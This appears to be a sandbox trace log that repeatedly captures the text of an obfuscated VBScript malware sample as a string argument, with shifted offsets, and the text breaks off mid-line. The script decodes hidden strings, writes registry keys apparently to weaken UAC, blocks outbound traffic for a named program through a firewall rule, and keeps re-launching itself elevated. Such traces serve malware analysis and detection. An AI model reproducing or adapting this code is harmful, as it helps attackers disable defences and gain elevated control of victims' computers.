Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 30 [0226.308] wcsncmp (_String1=" (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.308] wcsncmp (_String1="(asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.308] wcsncmp (_String1="asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.308] wcsncmp (_String1="sc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 